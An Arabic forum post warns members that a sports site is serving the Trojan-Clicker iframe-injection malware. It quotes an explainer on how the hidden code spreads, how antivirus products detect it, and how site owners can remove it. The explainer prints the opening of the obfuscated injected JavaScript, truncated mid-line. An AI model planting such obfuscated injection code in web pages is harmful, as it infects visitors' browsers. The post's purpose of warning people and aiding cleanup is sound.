احبتي الزعماء .. كيفكم ان شاء الله بخير .

مابي اطول عليك لكن فيه موضوع مهم جدا .. قبل قليل كنت اتصفح المواقع كالعادة .. واقرا

وحصلت رابط الرياضي اهم شي دخلت عليه .. لما بغيت اروح للصفحة الرئيسية اتضح لي انهم يزرعون فيها باتشات ..!

وهو من نوع : TrojanClicker


اسم الباتش كامل ...
الكائن المطلوب مصاب بالفيروسات التالية : Trojan-Clicker.HTML.IFrame.ey

اترك لكم الصوره للتأكد
http://www.arb-up.com/files/arb-up-2008-6/zX279087.jpg

طبعا الصورة مساحتها كبيرة .. لذالك حطيت الرابط

تفصلا عن الفايروس واضراره

إقتباس لأصحاب مواقع الـ HTML أو php , فإن التروجان هذا بالتحديد قد لا يخفى على أغلبهم ؛ نظراً لانتشاره كثيراً وعلى الساحة العربية وبأشهر المواقع والمنتديات أيضاً . التروجان يعرف أيضاً باسم آخر وهو Trojan Clicker . كذلك الكثير من الأسماء الأخرى كـ : Exploit-IFrame أو: IFrame Threat . يصنف التروجان بأنه من نوع: Iframe Trojan ؛ تحت مستوى خطورة عالية . عمل التروجان يتم تحت تقنية: Iframe Injection ؛ أي أنه يتم زرع كود مخفي في إحدى صفحات Main - Config - Index في الموقع , وهذا الكود لا يمكن زرعه أو إخفاؤه إلا في المواقع التي تعمل تحت لغات HTML أو php . عند وصول وتمكن التروجان من زرع الكود في أحد المواقع, فإنه سيتمكن من الانتشار في كافة مواقع السيرفر ذاته . Trojan Clicker أيضاً يضر بمتصفحي الموقع ؛ عبر رؤية إطارات أخرى تظهر من الصفحة ذاتها (إطارات منبثقة) , كذلك أحياناً تظهر طلبات بتحميل عناصر ActiveX خطرة وقد تضر بالجهاز . أيضاً فالملاحظ الأهم هو بطئ التصفح في الموقع بشكل كبير وملاحظ عن السابق . الكود الذي يتم زرعه في صفحات HTML أو php هو الكود التالي : كود: **********function v481c1bc9d2497(v481c1bc9d2aa0){ var v481c1bc9d2d96=16; return(parseInt(v481c1bc9d2aa0,v481c1bc9d2d96));}function v481c1bc9d35a3(v481c1bc9d39b0){ var v481c1bc9d45a5=2; var v481c1bc9d3dac='';for(v481c1bc9d41a8=0; v481c1bc9d41a8 ولهذا يجب التأكد من وجود هذا الكود بأي صفحة HTML أو php من قبل أصحاب المواقع أو المنتديات ؛ فحذف هذا الكود هو أمر ضروري جداً لردع Trojan Clicker . المشكلة تكمن هنا في أن إزالة الكود ليست حلاً نهائياً ومؤكداً لإزالة التروجان ؛ فجميع المواقع أو الشركات المتخصصة بمكافحة الفايروسات لم تبين ذلك ولم تؤكده . علماً بأن الكثير من أصحاب المواقع قد لاحظوا تحسن في حل المشكلة عبر إزالة الكود ؛ لكنه لم يكن نهاية التروجان بالنسبة إليهم . من منظور الزوار أو متصفحي المواقع , قد يلاحظ البعض حجب الموقع فوراً عند دخوله أو التبليغ عن وجود Trojan في محتوى الصفحة المطلوبة . هذا قد لا يظهر إلا لمستخدمي KapserSky Internet Security 2009 (يظهر التروجان باسمه الافتراضي) أو برامج McAfee (يظهر التروجان باسم: Exploit-IFrame) أو لمستخدمي Sophos (يظهر التروجان باسم: Mal/ObfJS-AB) أو مستخدمي الجدار الناري ZoneAlarm (يظهر التروجان باسمه الافتراضي) . رسالة KasperSky التي ستظهر عند حجب الموقع ستكون كالتالي : http://www.arb-up.com/files/arb-up-2008-6/zX279087.jpg أما لمستخدمي G-Data Anti-Virus ؛ فأيضاً يتم كشف التروجان بالشكل التالي: أما لمستخدمي بقية أو أغلب البرامج المتبقية ؛ فالمواقع المصابة بالخطر ذاته لن يمكن كشفها ؛ لكون Database تلك البرامج ليست مزودة بمعلومات حول هذا الخطر . من تلك البرامج التي تمت تجربتها على Trojan Clicker هي برامج : AVG و ESET Smart Security و Avira . هذا ما قد يضعها بدرجة ثانوية أمام البرامج الأخرى التي تتمكن من اكتشاف التروجان . من ناحية أنظمة التشغيل ؛ فإن التروجان يصيب الأنظمة: Windows 98, ME, NT, 2000, XP, Server 2003, Vista . حتى الآن ؛ لم يتم التأكد من أي طريقة لإزالة التروجان نهائياً . غير أن أكبر ما يمكن القيام به هو مراجعة أي صفحة HTML أو php بالموقع وإزالة منها الكود . كذلك إضافة جدار الحماية ZoneAlarm الناري مع نسخة حديثة من برنامج KasperSky وتفعيل Proactive Defence وجدار الكاسبر الناري أيضاً تحت قيود تشديد محكمة .

وفي الختام اتمنى ان لا اكون خالفت الانظمة ... ولكن لمحبتي بكم جرى التنويه
تحياتي